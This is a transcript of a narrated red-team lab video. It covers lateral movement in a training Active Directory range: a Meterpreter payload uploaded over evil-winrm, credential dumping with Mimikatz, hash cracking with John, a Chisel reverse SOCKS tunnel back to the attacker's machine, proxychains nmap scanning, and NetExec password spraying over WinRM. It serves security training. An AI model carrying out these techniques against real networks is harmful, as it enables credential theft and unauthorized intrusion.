there we go. I don't claim to be a binary exploitation guru, but I do know that exit func equals thread is something you want to have in mind, and definitely feel free to do your research on why that is. But let's run this. It's the equivalent of a netcat listener. There's nothing too special about it. It's just ready to go. So we've got siren.exe, and that's in here with Chisel. It's chilling with Mimikatz, SharpHound. Let's evil WinRM. I can go back up. Let's evil WinRM backend as the user Freya. And who am I? We're Freya. We're going to cd2c Windows tasks. And we're going to upload siren.exe, or whatever you call it. Whatever you decide to call it. Maintenance.exe. Putty.exe. You know, whatever you want to call it. But info upload successful. Great. We can type directory, and there is mimikatz.exe and siren.exe. We need, the reason we're doing this, why are we doing this? We want a more stable shell. We want a more stable shell. I cannot emphasize that enough. In fact, I'll do it on a new line for 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 a new line. We need a more stable shell, and we need that ability to be persistent to maintain access. Remember, from this point forward, you could add yourself as an, if you got administrator with getsystem or whatever it is, or some precompiled kernel payload, whatever it is, a misconfiguration, whatever it is. If you got administrator or NT system authority, NT authority system, if you got that, you would run Mimikatz and begin exfiltrating credentials from that machine. And remember, you can also type ipconfig, get that networking information, ipconfig / display DNS, who we talking to, what's going on? Who we talking to, what's going on around here? 10.65.20.20 dcarc.arc.corp. I mean, this shows you a little bit of the, it helps, I feel like it helps with that offensive mindset of saying, this is where I am in the arc.corp Active Directory forest. This is where I am. So little trick not to lose your shell, you can type cmd.exe / command, and I'm going to type who am I just to prove it. So you can type that and it'll spawn cmd.exe to execute that, return the output, and you don't lose your shell. Similarly, we're going to type cmd.exe / command siren.exe. And we're going to run that. Alt-tab backend, sending stage, and we've got a Meterpreter shell. Get UID, now we did that as Freya. So we got a shell that is stable as Freya. I can type background. I can type sessions-l. I can list them out. We've got already NT authority system on FemmeFetale, and now we've moved laterally with WinRM over via Freya and their cracked credentials from FemmeFetale to DCZERO, and we can re-interact with that shell by sessions-i5, smash that return key, get UID, and there we go. We've got a stable shell, and we're really kicking ass at this point. So, from this point forward, you might be asking, where do we go? I mean, you can always consult back to BloodHound. You can always consult back here. You know, this is with your coffee or your tea in hand. I like to, where was DCZERO? Here it is. What if we right-click this and shortest paths to here? Look at that, similar layout. Kinetic.corp, arc.corp, 0.arc.corp, and then the machine that we're actively on right now that we just got a shell on. DC0.0.arc.corp. And we have the information already from it thanks to SharpHound. By the way, being run on FemmeFetale. Thanks to that, we've got already the Active Directory information here, or a lot of it. So, very good stuff. Now, with a stable shell, we'll type shell. Super simple. We type shell. We can type directory. Now we've got a lot more stable shell. We can /mimikatz.exe. And remember, the reason we're doing this is because I'm just moving. I keep moving. I'm Siren. I go from machine to machine to machine to machine. I keep getting users. I keep getting credentials. And I want all of these credentials. Call me greedy. I'm sorry. Not greedy for the money. Greedy for the credentials to compromise the networks, network enterprise infrastructure, that kind of thing, if you get my drift. So anyway, greedy with the credentials. But what we're going to do is ./memecats.exe. Privilege, debug. Privilege to 20 OK. Remember the whoami /priv? That means we can token elevate. And lo and behold, if we type lsadump, LSA /patch, bling bling. So what we're going to do now is copy all of these credentials for every single one of these net users. Bring it all the way up here. Bring it through there. Control-Shift-C. Where does this go? Siren, where does this go? I'm going to leave this here. Leave this hovering. This is in a suspended state. This is giving us our stable shell. Let's drag that up and off the screen. All right. And what we're going to do is go back, CD to targets, FemmeFetale. Oh, wait a second. We're on a new one. Make directory, DCZERO. And what is that? 10.65.20.30, right? Not sure? Double check that enumeration. There it is. It's an Alt-Tab away. And we're going to make that directory. We're going to make dir vulns. Get into this habit. Files for any files of interest, information gathering, intel that we can collect on that network infrastructure, and specifically any exfiltrated information as well. If we want to download and pull back any sensitive exfiltrated information, like, I don't know, well, first let's do the standards. Touch users, touch passwords, touch hashes, LL to list it all out, CD to our exfiltration directory, and we're going to touch in here, I'm going to touch hashes, you can call this whatever you want, but hashes, and I'm going to make it in plain English, needs to be parsed, all right? Because this is a temporary file. And you guys remember that format from earlier that I was talking about with the MS cache? Could be very similar situation here. Could be a very similar situation. Or we could just have, here's the RID, right? And Kizzy and NTLM and so on and so forth. Look at all of these users. So what I'm going to do is Control X, Y, Enter. That's our exfiltrated information. If you're on a team with somebody else, they can SSH into this box. They can go to the engagement, go to their authorized target range. If you're a principal red team engineer like me, and be like, connect to our attacking box. It should be in kinetic range, and check out DCZERO under targets. That way they can go here, your red team members, and they can look at hashes that have been gathered, passwords, users, files of interest, miscellaneous files of interest, intelligence, whatever we get, exfiltrated information that's considered sensitive, SQL information, database information, configuration files, stuff like that. And then vulnerabilities for any exploits, weaponized code, things that need to be compiled and transferred. Hashes, passwords, users, you get the drift. So here we are, and we can now cat hashes that needs to be parsed. And I'm going to snap my fingers, pull a demonstrator card. Whoa, that doesn't look like the format, Siren. What's going on there? Well, here's the deal. I was having issues, thanks to the pause, with this. I hadn't had issues with it before, but I also felt like I could demonstrate something else that was important. These are NT hashes. Let's recall that. Control-Shift-E. CD to exfil and cat the dirty hashes file. These are NTL, that's an NTLM hash for a user. So if we plop it in here in terms of user credential format, Let me exit out of that right terminal. This would be -- format equals int for Windows here, and John. So we're gonna Control X, Y, enter, clear this. We're gonna cat hashes. That's what we got. This is our present working directory. And we're gonna John hashes -- word list is equal to user share word list rocky.txt -- format equals int. And just like that, it's done. Less than, like, how long did, I mean, I say less than a second. How long did that take? Not long. About 1 second. About 1 second, and we had all of these cracked. So now what are we gonna do? I'm gonna open a new terminal, Control-Shift-O, and we're gonna nano users. And we're gonna put them all in, right? So Clover, Freya, Renala, Kizzy. Look at all these users that we're getting. River, Benji, I mean, Rosabelle, Folky, Antolios, June, Artem, Jed, just a plethora of users back. And then we're gonna nano passwords, Starlight, Mountain, Moonbeam, Airwolf, Red Cloud, and then everything, those were the same passwords. That's credential reuse on the second machine on DCZERO, by the way. That would be a finding for your formal report. But now the new user specific to DCZERO with River, we have Skulls, Slammer, and I'm just gonna copy these to make sure they're exactly perfect. Skull Slammer, King Tornado Man, Ghost Hunter 98, Fantastic Fig, Eagle 1411, Dark Lake, 20 Metro 00, and 111 Rex. Now we have I'm gonna exit this. We have cat users. We'll clear this out. Cat users, cat passwords. Isn't that beautiful? So we've cracked the credentials. We've done some amazing goodness there. The one thing we haven't covered in this module, which comes up now, is pivoting. Remember our networking information? What are these doing here? So we know about the .20. We can ping these machines, right? Like if I just type ping-c3 and send 3 ICMP packets at it, yeah, there's DCZERO 20.30. Yeah, we can do that. What about these here from the ARC table that we did in our network reconnaissance and post-exploitation on that Windows machine that was compromised? If I try ping and try sending 3 here, oh man. So that third octet of that class B and then class C range, well, this class C range that we're working with, .10.0 through 255, we have 90, 91, and 92. 90, 91, and 92. Can I ping 91? No. Can I ping 92? No. Can I go back into a shell from here? And it looks like we did lose our session. That's okay. Sessions-L, Sessions-I4 to interact with FemmeFetale, which is the one that we wanted anyway. We're going to drop into a shell and ping in two ICMP packets at 10.65.10.90. Well, we can do it from here. We can ping into 10.65.10.91 from here. So it looks like if we have access to FemmeFetale, which is not on here, but if we have access to FemmeFetale, which is a part of the arc.corp domain, right? If we have access to FemmeFetale, then we can reach these machines. So we need to do something called tunneling. Or tunneling, pivoting. You can tunnel out like a specific protocol if you want. Maybe you want to be able to access you know, 10.65.10.91. And by the way, since Netcat isn't here, what if I want to check and see from here? I know I can access it. We don't have Nmap on this Windows machine that we compromised, but we have curl. Here's a nifty trick that can also help you with server-side request forgery. You can use curl, it's a network utility. 10.65.10.90, and instead of port 80 like curl's intended use, what if we specify 22 to see if SSH is open? Yeah, on that machine, we actually got back a header, SSH. So we just kind of did our own little netcat nmap reconnaissance. Siren, that can't be right. You can't have just done a network scan like nmap with curl, did you? 10.65.10.90. Let's put a port in there that isn't running, like 1, 2, 3, 4, 5. Connection refused. Curl HTTP 10.65.10.90. What about RDP? Can I remote desktop from FemmeFetale into whatever that .90 machine is? 3389. Alright, it doesn't seem like we're getting anything back on that. What else? I mean, if I could RDP into something, that'd be great, right? That'd be great. Now this may time out after 20 to 30 seconds, but I think you get the point here. The point is that we can access this .10.90, .10.91, and .10.92 that we got from our art tables, right? And we can even perform a small degree of network reconnaissance with a utility kind of like curl. Now it kind of wants to sit here forever, so I'm gonna background that, drop into another shell, just use Control-C, CD to Windows tasks, because that's where we live. Curl HTTP 10.65.10. Let's try 91 on 3389. Does 91 have RDP? Not looking like it. Not looking like it. Now we could also set a timeout with curl. And we can do that with the, if we Control-C, or Control-Z, yes, drop into another shell, CD to C Windows tasks. We can do that and curl back 10.65.10. Which one didn't work? It was 90 on port 3389. What if we set a max, or let's say connect timeout of 5 seconds? 0, 1, 2, 3, 4, 5, 6. Okay, so that didn't work either. Maybe this is an outdated version of curl, or maybe it's different on Windows. I can't say. Let's try Control-C and try terminating channel 5, and then drop into another shell. We don't have to go anywhere else. I want to get this right though. I don't know about you, but I want to get this right. Let's try my initial guess, which was max time. Curl from FemmeFetale. Again, we can type host name, and there we are, FemmeFetale. Curl HTTP 10.65.10.90 on, we know 3389 ain't there, but we want to learn about a network reconnaissance and scanning utility that we could use as a lay off the land binary at the same time. -m. 5 seconds. And let's see if it goes to 5 seconds and times out. Boom. So we know that we can use curl to effectively enumerate or perform what you would think of kind of like an nmap scan, right? Reconnaissance. Let's try 92 on 3389 with a max timeout of 5 seconds. Connection refused, but it didn't. Ooh, that's interesting. It didn't have to go. We got a failed to connect. Obviously, that's because we're speaking HTTP and RDP running on 3389 speaks remote desktop protocol, but that would hypothetically mean that it's actually open. Let's see if we get on that same machine, .92, 1, 2, 3, 4, 5, 6, or just 1, 2, 3, 4, 5, dash max timeout of 5 seconds. And if we let that sit, yeah, that took 5 seconds before it timed out. So that's definitely interesting that we're able to do that kind of thing. Now let's CD to C Windows tasks. And let's take a look at something here. dir-a-o-q. Complete directory command. Or we could just type dir. Whatever you like. We got chisel.exe. So we're going to be utilizing Chisel to perform our operation so that we can reach those machines, nmap them down, RDP in, whatever we want, by pulling back. Imagine a tug of war and you're pulling on a rope. By pulling back the network capabilities of FemmeFetale back to our own attacking machine. And that's what we're going to do. First thing we need to do is go back here, clear the screen, and I'm going to type tunnel reference, and don't worry, I will provide this all as a resource. But we're going to need to have a separate terminal off and to the side, doing its own thing. Actually, targets. And where you have the local binary for Chisel here, this is just the Chisel binary on Kali Linux. However, nonetheless, you want to type Chisel on Kali. This is going to be our server. We're going to serve as SOX5 -- reverse. And that says 8080's in use. If you ever get that, you might know what it is. Burp Suite. Go to proxy settings, 8080. Just go ahead and disable that, and you can still use Burp Suite. Just set it to 8081, hit OK, and now we're using 8081 for Burp Suite. We'll clear this out, and now we'll try it. And there we go. So we have an active, established listening server. All we really need is the fingerprint here. And we're also going to need our Kali attacking IP. So if config tun0 off of the OpenVPN or tun0 interface. And mine is 172.20.084. And then on the target machine, we're going to type chisel.exe client -- fingerprint. And remember this unique little flag here? Just copy that on over to the clipboard because you're going to need that. And then aside from that, then we just specify our IP. The listening server is 8080. And this R just basically says, pull everything back over a SOX proxy. I'm not looking to tunnel out a specific port like 80 to access HTTP or 22 to access SSH. Give me it all over a SOX proxy. Okay? And so what we're going to do is go over here, type ./chisel.exe. This is going to be the client -- fingerprint. Paste that value in that we got, right? And then you can Alt-Tab back, copy your attacking IP address, :8080 R and SOX. And I'll leave this here for a few seconds. If you need to analyze it further, take a look. But there it is. And then we'll hit the return key. Connecting, and connection established. Excellent. So we have that. Now how do we use it? There's a little tool known as Proxychains. I'm going to drag that off. But we need to make a configuration change. So we need to nano etc Proxychains. For me, it's nano etc Proxychains4.com. Hold the control key, down arrow, all the way to the bottom. Yours needs to look like this. SOX5 space 127001 1080, or what would be the Tor. Tor networking protocol is often off of 1080. Well, we're using that here as SOX5, and that's it. Just make sure yours looks under proxy list. Make sure yours looks just like mine. I'll leave it here for a few seconds so you can pause and you can look at it. And now that you've got your configuration pretty much set like that, I'm going to Control X, Y, enter. You're going to have to save it on your end. It's already done on mine. Let's do Proxychains. And now let's try Nmap. And we'll say -pn, treat the host as alive, -st. And we'll say scan ports. I want to look for 22, or 21, 22, port 8, 25. I want to look for 80. I want to look for 3389, remote desktop protocol, 5985. I want to look for WinRM, 139445, or let's do 135.139.445. And I want to scan 10.65. Remember, if I try and open a new, you don't have to do this, but just look, 10.65.10.10 or .10.90, I'm still not going to be able to reach this. It's not going to work. But if I Proxychains nmap-pn-st, these specified ports, these critical ports, then I'm going to put in .10.90 through, let's get it all done in one go, 90 through 92. Make sure you do it with UID = 0 or root privileges, sudo privs. I'm going to punch this in, and that's a lot better. Already we're getting Proxychains output. I was like, where in the heck is that? So remember to sudo Proxychains nmap. And now I'll go ahead and pause the video because this is slower. This is with latency. So remember to sudo Proxychains nmap. This is with latency. This is why I specify only a few very key ports. Because if we were to try to do -p-, that's 65,535 ports. That's not fast, that's not quick, that's not efficient, that's not lethal. We need to be thinking that way out of the gate here. So targeting, FTP, SSH, mail, HTTP, remote desktop protocol, WinRM. If we can WinRM into it, that'd be amazing. Server message block for any writable shares. Things like that are going to be crucial. You could even tack in 443 on there if you wanted to, or 10 other ports. The point is that we don't, maybe I don't have to pause the video, maybe it's just going to go. And there we go. We have not only successfully tunneled, the point is that we've successfully tunneled and just performed an internal, we hit the dirt on FemmeFetale and we pivoted into a network-segregated, firewalled off environment. Dude, like, that's the point. And, yeah, I mean, at this point, we could just go to Cherry Tree, arc.corp, and say, add a subnode. This is an unknown internal network to me, so I'm going to call this some unknown internal that we just, discovered via our arc tables. I'm going to paste this in. I'm going to highlight these IPs that were not accessible. I repeat, were, as in the past, were not accessible, and now they're accessible. And guess what we can do with things like that? You might have guessed correctly, we can net execute with Proxychains as well. So we can sudo nxc. Oh yeah. Oh yes. Well, did we have, which one of these machines, did any of them have, yeah. One of them had 5985, 598, in fact, all three of them had 5985 open. What if we sudo nxc, all right, and we specify 10.65.10.90 through 92, and -user as users, -p as passwords, and we're gonna say our protocol is WinRM. And in the event of compromise, execute whoami. But before dropping that, let's make sure our users are good. That looks great. Let's cut our passwords. Everything looks great. And we're gonna sudo Proxychains. All you gotta do is put Proxychains right in front of the normal command that you would have done. And we may end up lucky here. We may not. But the idea is that we've covered so much critical information that, I mean, it really should be prevalent. don't worry about, you know, all of this extra output on the screen. We're testing over a long network, right? We have a lot of latency, and we're testing it against 3 machines over WinRM protocol, given it is 1 port, but it's going relatively quickly. I mean, surprisingly quickly. Usually Proxychains would not, I mean, it would have a great deal of delay. But that's the one thing I love about Slayer Labs, is it's emulating that delay, you know, to the best of its ability. It's emulating real world ping, so on and so forth. And we want to just kind of let this go. So I'm going to pause the video, and look, even if we don't get anything back from this, what have you taken home here with Startup.Security and Siren? What have you taken home with me? The ability to not just get onto a machine, but to use Chisel to set up a SOX proxy to proxy chains, not just the network mapper tool like Nmap, but NetExec to do password and username credential spraying through proxy chains into an internal network and network-segregated environment. Try and comprehend what I just said. If you didn't comprehend it, rewind. I'm gonna pause, and we'll be back. So I'm unpausing here. Look, it's still going. So don't think, and we still haven't gotten any hits, any successes, right? But just look. The point is, we're hitting up, you know, 5985. We've done it across this. We've managed to do it through Chisel, and so on and so forth. If we ever in the real world actually had a hit, we would just be able to proxy chains evil WinRM, pseudo proxy chains evil WinRM, and we'd be in that machine like it was nothing. That's why you want to add 5985 these days to your scans when you're doing your host reconnaissance scans, and you're going through that entire process. That's why you want to do it. That's why. And see, the bar here has only just ticked up 1 time. We've gone through, iterated all username password combinations on DC Pulsar. Now we're moving up to 33% here on uplink. I'm going to go ahead and unpause again, and I'm disappearing. So unpausing here, we've now moved through all of uplink and did not get any successful results with evil WinRM, but that's okay. Again, that is okay. Now let's try undermine, and let's see if any of these username password credentials were reused for WinRM. In the event that they were, that's an easy shell. All right, guys. Well, that's a complete wrap there. We did not get any hits, but the point is that is using NetExecute. Pseudo proxy chains, NetExecute over WinRM protocol over those mysterious machines in that internal network segregated environment, using the users and passwords that we were able to recover from cracked MS cache credentials and LSA cache patch credentials, etc. with that /patch. Remember that. lsadump and then : LSA /patch. But yeah, and then getting those cracked with John, attempting an execute of who am I? I said it before and I'll say it again. If you don't fully comprehend what's going on here, go ahead and hit the rewind button. Guys, my name is Siren with Startup.Security, and I look forward to seeing you in the next module. Peace out.